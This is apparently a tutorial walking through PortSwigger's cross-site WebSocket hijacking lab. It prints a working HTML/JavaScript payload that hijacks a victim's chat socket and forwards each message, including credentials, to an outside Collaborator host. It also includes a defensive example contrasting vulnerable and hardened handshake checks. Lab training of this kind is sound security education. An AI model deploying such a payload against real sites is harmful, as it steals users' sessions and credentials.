
Cross-site WebSocket hijacking

Introduction

Hello, how are you all doing? Today we continue our series on WebSocket vulnerabilities; this is the third article. In this one we cover the Cross-site WebSocket hijacking lab from PortSwigger Web Security Academy with a complete step-by-step practical walkthrough, explaining why the handshake can be hijacked and how the victim's chat history is exfiltrated.

Lab Description

This lab features a live chat implemented with WebSockets. To solve it, you host an HTML/JavaScript payload on the exploit server that performs a cross-site WebSocket hijacking attack and exfiltrates the victim's chat history. The chat history contains the victim's credentials, which you then use to log in as them.

Lab Solution

First, open the lab with Burp Suite running and the proxy enabled, then click on Live chat. The WebSocket handshake will appear in Burp's HTTP history and the messages themselves in the WebSockets history, so the traffic is easy to analyze.


Now type a few messages into the live chat, then refresh the page. In the HTTP history you will see a GET /chat request carrying the Upgrade: websocket header: this is the WebSocket handshake. Look at what authenticates it: only the session cookie. There is no CSRF token or other unpredictable value in the URL or headers, and the browser attaches that cookie to a handshake started from any origin unless the cookie's SameSite attribute prevents it, so a page on the exploit server can open the same socket as the victim. In the WebSockets history you can also see that the client sends the message "READY" and the server answers by replaying the chat history, which is exactly what we want to exfiltrate.

<script>
    // Open a socket to the target's WebSocket endpoint. The victim's browser
    // attaches their session cookie to this cross-site handshake.
    var ws = new WebSocket('wss://your-websocket-url');
    ws.onopen = function() {
        // The lab's chat client sends "READY" to make the server replay the chat history.
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        // Forward every message the server sends to Burp Collaborator.
        // mode: 'no-cors' lets the cross-origin POST be sent without a preflight.
        fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

This is the payload we will use: it performs the cross-site WebSocket hijacking and sends each chat message to Burp Collaborator. Two values need to be changed. Replace 'your-websocket-url' in the new WebSocket(...) call with the host and path from the GET /chat handshake (wss://<your-lab-id>.web-security-academy.net/chat), and replace 'your-collaborator-url' in the fetch call with a payload copied from the Collaborator tab.

Here is the final version:

<script>
    var ws = new WebSocket('wss://0aba009e0317a9d5827751eb00390009.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://l8u4670sxsrzg7tmasph6jovimocc1.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

In the version above the two placeholders have been filled in with my lab's WebSocket URL and my Collaborator payload; use the values from your own lab instance and your own Collaborator tab.
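To see why the lab's handshake is hijackable and what a fixed server would check instead, here is an added example (not part of the lab or of the original post) that models the server-side decision for the GET /chat upgrade request. The request objects, session ids, CSRF token and exploit-server origin are constructed stand-ins; only the lab hostname is taken from the payload above. It also shows why a substring match on the Origin header is not a fix.

```javascript
// Added example: a model of the server-side check on the GET /chat handshake.
// Request objects below are constructed stand-ins for parsed HTTP upgrade
// requests; session ids, tokens and the exploit-server origin are hypothetical.

const LAB_ORIGIN = 'https://0aba009e0317a9d5827751eb00390009.web-security-academy.net';
const EXPLOIT_ORIGIN = 'https://exploit-0a1b.exploit-server.net'; // hypothetical

// Constructed session store: session cookie value -> logged-in user.
const sessions = new Map([['s3ss10n-carlos', 'carlos']]);
// Constructed per-session CSRF tokens a fixed server would embed in the chat page.
const csrfTokens = new Map([['s3ss10n-carlos', 'tok-9f2c']]);

function parseCookies(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const i = part.indexOf('=');
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// Vulnerable policy (what the lab does): the only credential checked is the
// session cookie. The browser sends it on a cross-site handshake too, so any
// origin that can make the victim's browser connect gets the victim's session.
function vulnerableHandshake(req) {
  const sid = parseCookies(req.headers.cookie).session;
  if (!sid || !sessions.has(sid)) return { accepted: false, reason: 'no valid session' };
  return { accepted: true, user: sessions.get(sid) };
}

// A tempting but broken fix: substring matching on the Origin header.
function weakOriginAllowed(origin) {
  return typeof origin === 'string' && origin.includes('web-security-academy.net');
}

// Hardened policy: exact Origin match AND a per-session CSRF token carried in
// the handshake URL. The cookie alone says nothing about who started the socket.
function hardenedHandshake(req) {
  if (req.headers.origin !== LAB_ORIGIN) return { accepted: false, reason: 'bad origin' };
  const sid = parseCookies(req.headers.cookie).session;
  if (!sid || !sessions.has(sid)) return { accepted: false, reason: 'no valid session' };
  const token = new URL(req.url, LAB_ORIGIN).searchParams.get('csrf');
  if (!token || token !== csrfTokens.get(sid)) return { accepted: false, reason: 'bad csrf token' };
  return { accepted: true, user: sessions.get(sid) };
}

// Constructed handshake as the victim's browser sends it from the exploit page:
// Origin is the attacker's, but the session cookie rides along.
const crossSiteReq = {
  url: '/chat',
  headers: {
    host: new URL(LAB_ORIGIN).host,
    origin: EXPLOIT_ORIGIN,
    upgrade: 'websocket',
    cookie: 'session=s3ss10n-carlos',
  },
};

// The same user opening the chat from the lab page itself, with the token.
const sameSiteReq = {
  url: '/chat?csrf=tok-9f2c',
  headers: { ...crossSiteReq.headers, origin: LAB_ORIGIN },
};

// An Origin crafted to defeat the substring check (attacker-controlled host).
const spoofedOrigin = 'https://web-security-academy.net.' + new URL(EXPLOIT_ORIGIN).host;

function demo() {
  return {
    vulnerableCrossSite: vulnerableHandshake(crossSiteReq), // accepted as carlos
    hardenedCrossSite: hardenedHandshake(crossSiteReq),     // rejected: bad origin
    hardenedSameSite: hardenedHandshake(sameSiteReq),       // accepted
    weakCheckSpoofed: weakOriginAllowed(spoofedOrigin),     // true: bypassed
    exactCheckSpoofed: spoofedOrigin === LAB_ORIGIN,        // false
  };
}

console.log(demo());
```

The exact-match Origin check already stops the attack from a browser, since a browser never lets a page forge Origin; the CSRF token in the handshake URL is the belt-and-braces layer that also covers clients or proxies that omit Origin, and it is what the PortSwigger remediation advice means by an unpredictable token in the handshake.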


After clicking on the exploit server in the lab, paste your payload into the body section and click on “Store” to save it. Now, click on “View exploit”.


Clicking "View exploit" runs the payload in your own browser, which is useful to confirm that it works against your own session. To solve the lab, click "Deliver exploit to victim". Then go to the Collaborator tab and click "Poll now": each POST request body contains one message from the victim's chat history.


Among the polled requests you will find the messages that contain the victim's username and password, but the text is encoded. To decode it, paste it into Burp Decoder and click "Smart decode".

You can see that I have obtained the username and password. Now, I will proceed with logging in.

After logging into Carlos’s account, we have successfully solved the PortSwigger Web Security lab on Cross-site WebSocket hijacking.

In the next article, we will cover the lab “User ID controlled by request parameter” from PortSwigger Web Security, providing a practical step-by-step solution.

FAQS

What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting web applications from attacks that exploit vulnerabilities such as SQL injection, cross-site scripting (XSS), file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always good practice to use an up-to-date browser and to keep its extensions updated, to avoid suspicious websites and links, to enable two-factor authentication on your accounts, and to be wary of pages that try to trick you into clicking hidden elements (clickjacking).

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
